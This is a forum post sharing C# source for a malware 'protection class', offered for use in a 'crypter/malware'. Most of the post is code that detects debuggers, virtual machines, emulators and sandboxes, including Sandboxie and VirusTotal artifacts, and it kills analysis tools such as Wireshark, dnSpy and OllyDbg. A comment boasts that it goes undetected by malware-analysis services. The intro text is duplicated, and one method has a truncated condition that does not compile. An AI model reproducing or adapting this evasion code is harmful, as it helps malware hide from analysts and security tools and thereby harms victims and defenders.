Here's a big protection class I assembled from some sources on the internet and some code I wrote myself. It features:
Anti-debugging (.NET/Win32 API/Olly)
Basic anti-emulation
Anti-VM (Virtual Machine) several techniques
Anti-Sandbox (several, including VirusTotal's own)
It requires the following imports:
System.Management
System.Windows.Forms
Here's how you use it in your crypter/malware:
Module Protection.cs
Anti-debugging (.NET/Win32 API/Olly)
Basic anti-emulation
Anti-VM (Virtual Machine) several techniques
Anti-Sandbox (several, including VirusTotal's own)
It requires the following imports:
System.Management
System.Windows.Forms
Here's how you use it in your crypter/malware:
>using System;
using System.IO;
namespace protectiontest
{
    /// <summary>
    /// Sample host for <see cref="Protection"/>: builds a settings object with every
    /// check enabled, runs the checks, and only then does its own work.
    /// </summary>
    class Program
    {
        // Every check enabled; Check_Timeout is the sleep (ms) between the repeated
        // checks run by the worker threads inside Protection.
        private static ProtectionSettings settings = new ProtectionSettings() {
            VirtualMachine = true,
            Debugging = true,
            Emulation = true,
            Sandbox = true,
            Snooping = true,
            Check_Timeout = 1000,
        };
        private static Protection protection = new Protection(settings);

        /// <summary>
        /// Entry point. <c>protection.Start()</c> either returns (nothing detected),
        /// never returns (it parks the thread in <c>Application.Run()</c>), or ends the
        /// process via <c>Environment.FailFast</c>; the statements after it therefore
        /// execute only in the first case.
        /// </summary>
        static void Main(string[] args)
        {
            if (!protection.Running)
            {
                protection.Start();
            }
            //if we detected something, the following code would be unreachable
            File.WriteAllText("running.txt", "hello world");
            Console.WriteLine("My app");
            Console.Read();
        }
    }
}
Module Protection.cs
[HIDE-THANKS][LENGUAJE=C#]
Code:
>using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Windows.Forms;
/// <summary>
/// Mutable settings bag consumed by <see cref="Protection"/>. All members are public
/// fields, and the worker threads re-read the flags on every iteration, so changes
/// made after <c>Protection.Start()</c> take effect on the next loop pass.
/// </summary>
public class ProtectionSettings
{
    /// <summary>Sleep interval, in milliseconds, between repeated checks on the worker threads.</summary>
    public int Check_Timeout = 1000;
    /// <summary>Run the one-time virtual-machine check in <c>Start()</c>.</summary>
    public bool VirtualMachine;
    /// <summary>Run the debugger check in <c>Start()</c> and keep repeating it on a thread.</summary>
    public bool Debugging;
    /// <summary>Run the one-time timing-based emulation check in <c>Start()</c>.</summary>
    public bool Emulation;
    /// <summary>Run the window-title scan in <c>Start()</c> and keep repeating it on a thread.</summary>
    public bool Snooping;
    /// <summary>Run the one-time sandbox check in <c>Start()</c>.</summary>
    public bool Sandbox;
    /// <summary>
    /// Lower-case substrings compared against every process's main window title
    /// (<c>Contains</c>, not equality), so any title containing one of these matches.
    /// </summary>
    public string[] Snooper_Titles = new string[] { "wireshark", "ilspy", "dnspy", "ollydbg", "de4dot", "megadumper" };
}
/// <summary>
/// Runs a set of environment checks once in <see cref="Start"/> (VM, debugger, sandbox,
/// emulation, analysis-tool windows) and then repeats the debugger and window-title
/// checks on two worker threads. A positive result either terminates the process
/// (<see cref="spoofCrash"/>) or parks the current thread in a message loop
/// (<see cref="endlessLoop"/>).
/// </summary>
public class Protection
{
    private ProtectionSettings _settings;

    /// <summary>
    /// Settings in use. The worker threads read this property on every iteration,
    /// so assigning a new instance at runtime changes their behaviour immediately.
    /// </summary>
    public ProtectionSettings Settings
    {
        get { return _settings; }
        set { _settings = value; }
    }

    // Set to true at the end of Start(); only a guard, it is not observed by the threads.
    private bool _running = false;

    #region Threads
    // Neither thread is marked IsBackground, so once started they keep the
    // process alive after Main returns.
    private Thread AntiDebuggingThread;
    private Thread AntiSnooperThread;
    #endregion

    #region API
    /// <summary>Kernel32: sets <paramref name="isDebuggerPresent"/> when a debugger is attached to <paramref name="hProcess"/>.</summary>
    [DllImport("Kernel32.dll", SetLastError = true, ExactSpelling = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)]ref bool isDebuggerPresent);

    /// <summary>Kernel32: true when a user-mode debugger is attached to the calling process.</summary>
    [DllImport("kernel32.dll")]
    private static extern bool IsDebuggerPresent();

    /// <summary>Kernel32: handle of a module already loaded in this process, or IntPtr.Zero if it is not loaded.</summary>
    [DllImport("kernel32.dll")]
    private static extern IntPtr GetModuleHandle(string module);

    /// <summary>
    /// User32: finds a top-level window by class name. The second parameter is really
    /// lpWindowName; it is declared as IntPtr so the single caller can pass NULL.
    /// </summary>
    [DllImport("user32.dll", SetLastError = true)]
    private static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly);

    /// <summary>Kernel32: address of an exported function, or IntPtr.Zero when the export does not exist.</summary>
    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    /// <summary>Kernel32: file attributes, or INVALID_FILE_ATTRIBUTES (0xFFFFFFFF) when the path cannot be opened.</summary>
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern uint GetFileAttributes(string lpFileName);
    #endregion

    /// <summary>True after <see cref="Start"/> completes; cleared by <see cref="Stop"/>.</summary>
    public bool Running
    {
        get { return _running; }
        set { _running = value; }
    }

    /// <summary>Stores <paramref name="settings"/>; no checks run until <see cref="Start"/>.</summary>
    public Protection(ProtectionSettings settings)
    {
        this.Settings = settings;
    }

    /// <summary>
    /// Runs each enabled one-time check in this order: VM, debugger, sandbox, emulation,
    /// window titles. Then starts the two worker threads unconditionally (their loops
    /// exit at once if the matching flag is false) and sets <see cref="Running"/>.
    /// May not return: a VM or sandbox hit calls Environment.FailFast, a debugger or
    /// emulation hit blocks in Application.Run().
    /// </summary>
    public void Start()
    {
        if (Running) return;
        //Do one time checks
        if(Settings.VirtualMachine)
        {
            if(isProcessVirtualized())
            {
                spoofCrash();
            }
        }
        if (Settings.Debugging)
        {
            if (isDebugged())
            {
                endlessLoop(); //endless loop on first check, but crash if we're on thread (somebody attached a debugger while running)
            }
        }
        if (Settings.Sandbox)
        {
            // Application.ExecutablePath is the path of the running executable.
            if (isProcessInSandbox(Application.ExecutablePath))
            {
                spoofCrash();
            }
        }
        if(Settings.Emulation )
        {
            if(isEmulated())
            {
                endlessLoop();
            }
        }
        if (Settings.Snooping)
        {
            checkSnooping();
        }
        //Start continous checks
        AntiDebuggingThread = new Thread(debuggerThread);
        AntiDebuggingThread.Start();
        AntiSnooperThread = new Thread(snooperThread);
        AntiSnooperThread.Start();
        Running = true;
    }

    /// <summary>
    /// Drops the thread references and clears <see cref="Running"/>. Note that this does
    /// not end the worker loops: they test <c>Settings.Snooping</c> / <c>Settings.Debugging</c>,
    /// not these fields, so they keep running until those flags are set to false.
    /// </summary>
    public void Stop()
    {
        if (!Running) return;
        if (AntiDebuggingThread != null)
        {
            AntiDebuggingThread = null;
        }
        if (AntiSnooperThread != null)
        {
            AntiSnooperThread = null;
        }
        Running = false;
    }

    #region ProtectionMethods
    /// <summary>
    /// Terminates the process immediately through Environment.FailFast (no finally
    /// blocks run; the runtime writes a failure entry to the Windows event log).
    /// </summary>
    private void spoofCrash()
    {
        GC.Collect();
        Environment.FailFast(null);
    }

    /// <summary>
    /// Blocks the calling thread in a WinForms message loop with no form, so it never
    /// returns on its own; the process stays alive but idle.
    /// </summary>
    private void endlessLoop() //simple but undetected by malwr.com and virustotal
    {
        Application.Run();
    }
    #endregion

    #region Checks
    /// <summary>
    /// Combines the managed checks (Debugger.IsAttached, Debugger.IsLogging) with the
    /// Win32 ones (CheckRemoteDebuggerPresent on our own handle, IsDebuggerPresent).
    /// </summary>
    /// <returns>True if any of the four checks is positive.</returns>
    private bool isDebugged()
    {
        bool flag = false;
        //Managed
        if (Debugger.IsAttached) flag = true;
        if (Debugger.IsLogging()) flag = true;
        //Unmanaged
        bool remotedbg = false;
        CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref remotedbg);
        if (remotedbg) flag = true;
        if (IsDebuggerPresent()) flag = true;
        if (flag)
        {
            // Debug.Print is compiled out of release builds.
            Debug.Print("Debugger detected, eternal loop");
        }
        return flag;
    }

    /// <summary>
    /// Heuristic sandbox fingerprint: a specific DLL loaded in this process, fixed
    /// process/machine/user names, fixed path fragments in <paramref name="startupPath"/>,
    /// and the presence of one window class. All comparisons are against hard-coded
    /// strings, so the check is only as good as this list.
    /// </summary>
    /// <param name="startupPath">Path of the running executable (the caller passes Application.ExecutablePath).</param>
    /// <returns>True on the first match, false if none matches.</returns>
    private bool isProcessInSandbox(string startupPath)
    {
        // Module loaded into this process.
        if ((int)GetModuleHandle("SbieDLL.dll") != 0)
            return true;
        // Process and machine names.
        if (Process.GetCurrentProcess().ProcessName == "mlwr_smpl")
            return true;
        if (Environment.MachineName.StartsWith("placehol-"))
            return true;
        // Current Windows account name, upper-cased for the comparison.
        switch (WindowsIdentity.GetCurrent().Name.ToString().ToUpper())
        {
            case "USER": return true;
            case "SANDBOX": return true;
            case "VIRUS": return true;
            case "MALWARE": return true;
            case "SCHMIDTI": return true;
            case "CURRENTUSER": return true;
        }
        // Executable path, exact match first and then substrings.
        string sPath = startupPath.ToUpper();
        if (sPath == "C:\\FILE.EXE")
            return true;
        if (sPath.Contains("\\VIRUS"))
            return true;
        if (sPath.Contains("SANDBOX"))
            return true;
        if (sPath.Contains("SAMPLE"))
            return true;
        // Top-level window with this class name present on the desktop.
        if ((int)FindWindow("Afx:400000:0", (IntPtr)0) != 0)
            return true;
        return false;
    }

    /// <summary>
    /// Timing check: sleeps 500 ms and compares Environment.TickCount before and after.
    /// NOTE(review): the comparison on the <c>if</c> line is truncated in this copy of the
    /// source (the operator and right-hand side are missing), so the method does not
    /// compile as shown.
    /// </summary>
    private bool isEmulated()
    {
        long tickCount = Environment.TickCount;
        Thread.Sleep(500);
        long tickCount2 = Environment.TickCount;
        if (((tickCount2 - tickCount) {
            return true;
        }
        return false;
    }

    /// <summary>
    /// Looks for hypervisor guest artifacts: SCSI/BIOS identifier strings and guest-tools
    /// keys under HKLM, guest driver files under C:\WINDOWS\system32\drivers, a Wine-only
    /// kernel32 export, and the Win32_VideoController description reported by WMI.
    /// Returns true on the first hit. Every registry read goes through
    /// <see cref="readRegistryKey"/>, which never returns null.
    /// </summary>
    /// <returns>True if any artifact is found, otherwise false.</returns>
    private bool isProcessVirtualized()
    {
        // VirtualBox: SCSI identifier, BIOS strings, Guest Additions key, guest mouse driver.
        if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX")) { return true; }
        if (readRegistryKey("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX")) { return true; }
        if (readRegistryKey("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX")) { return true; }
        // "noValueButYesKey" is the sentinel readRegistryKey returns when the key exists but the default value is unset.
        if (readRegistryKey("SOFTWARE\\Oracle\\VirtualBox Guest Additions", "") == "noValueButYesKey") { return true; }
        // 4294967295 == INVALID_FILE_ATTRIBUTES, i.e. the file is absent or inaccessible.
        if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys") != (uint)4294967295) { return true; }
        // VMware: SCSI identifiers on ports 0-2, Tools key, disk enum, display class entries, guest drivers.
        if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; }
        if (readRegistryKey("SOFTWARE\\VMware, Inc.\\VMware Tools", "") == "noValueButYesKey") { return true; }
        if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; }
        if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; }
        if (readRegistryKey("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper())) { return true; }
        if (readRegistryKey("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE")) { return true; }
        if (readRegistryKey("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE")) { return true; }
        if (readRegistryKey("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS")) { return true; }
        if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmmouse.sys") != (uint)4294967295) { return true; }
        if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys") != (uint)4294967295) { return true; }
        // Wine: this export exists only in Wine's kernel32.
        if (GetProcAddress((IntPtr)GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0) { return true; }
        // QEMU: SCSI identifier and BIOS string.
        if (readRegistryKey("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU")) { return true; }
        if (readRegistryKey("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU")) { return true; }
        // WMI: compare the description of every video controller against known guest adapters.
        // The last test also treats an empty description as a hit, so hosts whose WMI
        // reports no description are flagged as well.
        ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2");
        ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_VideoController");
        ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query);
        ManagementObjectCollection queryCollection = searcher.Get();
        foreach (ManagementObject m in queryCollection)
        {
            if (m["Description"].ToString() == "VM Additions S3 Trio32/64") { return true; }
            if (m["Description"].ToString() == "S3 Trio32/64") { return true; }
            if (m["Description"].ToString() == "VirtualBox Graphics Adapter") { return true; }
            if (m["Description"].ToString() == "VMware SVGA II") { return true; }
            if (m["Description"].ToString().ToUpper().Contains("VMWARE")) { return true; }
            if (m["Description"].ToString() == "") { return true; }
        }
        return false;
    }

    /// <summary>
    /// Reads one value under HKEY_LOCAL_MACHINE and renders it as a string.
    /// </summary>
    /// <param name="key">Sub-key path relative to HKLM.</param>
    /// <param name="value">Value name; "" selects the key's default value.</param>
    /// <returns>
    /// "noKey" when the sub-key cannot be opened; "noValueButYesKey" when the key exists
    /// but the value is missing (or has a kind not handled below); otherwise the value
    /// converted to text (strings as-is, DWORD/QWORD as decimal, MultiString joined
    /// with no separator, Binary via Convert.ToString on the byte array).
    /// </returns>
    private string readRegistryKey(string key, string value)
    {
        RegistryKey registryKey;
        registryKey = Registry.LocalMachine.OpenSubKey(key, false);
        if (registryKey != null)
        {
            // The default below is a string, so a missing value returns through the
            // first branch without ever calling GetValueKind on a non-existent name.
            object rkey = registryKey.GetValue(value, (object)(string)"noValueButYesKey");
            if (rkey.GetType() == typeof(string))
            {
                return rkey.ToString();
            }
            if (registryKey.GetValueKind(value) == RegistryValueKind.String || registryKey.GetValueKind(value) == RegistryValueKind.ExpandString)
            {
                return rkey.ToString();
            }
            if (registryKey.GetValueKind(value) == RegistryValueKind.DWord)
            {
                return Convert.ToString((Int32)rkey);
            }
            if (registryKey.GetValueKind(value) == RegistryValueKind.QWord)
            {
                return Convert.ToString((Int64)rkey);
            }
            if (registryKey.GetValueKind(value) == RegistryValueKind.Binary)
            {
                return Convert.ToString((byte[])rkey);
            }
            if (registryKey.GetValueKind(value) == RegistryValueKind.MultiString)
            {
                return string.Join("", (string[])rkey);
            }
            return "noValueButYesKey";
        }
        return "noKey";
    }

    /// <summary>
    /// Scans every process on the machine and kills any whose main window title
    /// contains one of <c>Settings.Snooper_Titles</c> (case-insensitive substring
    /// match). If Kill() throws for any reason the whole process is terminated via
    /// <see cref="spoofCrash"/>. Processes without a main window have an empty
    /// title and never match.
    /// </summary>
    private void checkSnooping()
    {
        foreach (Process process in Process.GetProcesses())
        {
            string fixedname = process.MainWindowTitle.ToLower().Trim();
            foreach (string name in Settings.Snooper_Titles)
            {
                if (fixedname.Contains(name))
                {
                    try
                    {
                        process.Kill();
                        Debug.Print("Snooper process found and killed");
                    }
                    catch (Exception ex) //We couldn't kill it, crash the app to prevent snooping
                    { //Todo: check if the app was already killed? and if that was the reason why we got exception
                        //Then there's no need to crash
                        spoofCrash();
                    }
                }
            }
        }
    }

    /// <summary>
    /// Worker loop: repeats <see cref="checkSnooping"/> every <c>Settings.Check_Timeout</c> ms
    /// for as long as <c>Settings.Snooping</c> stays true (both re-read each pass).
    /// </summary>
    private void snooperThread()
    {
        while (Settings.Snooping)
        {
            checkSnooping();
            Thread.Sleep(Settings.Check_Timeout);
        }
    }

    /// <summary>
    /// Worker loop: repeats <see cref="isDebugged"/> every <c>Settings.Check_Timeout</c> ms
    /// while <c>Settings.Debugging</c> is true. Unlike the first check in <see cref="Start"/>,
    /// a hit here terminates the process instead of entering the message loop.
    /// </summary>
    private void debuggerThread()
    {
        while (Settings.Debugging)
        {
            if (isDebugged())
            {
                spoofCrash();
            }
            Thread.Sleep(Settings.Check_Timeout);
        }
    }
    #endregion
}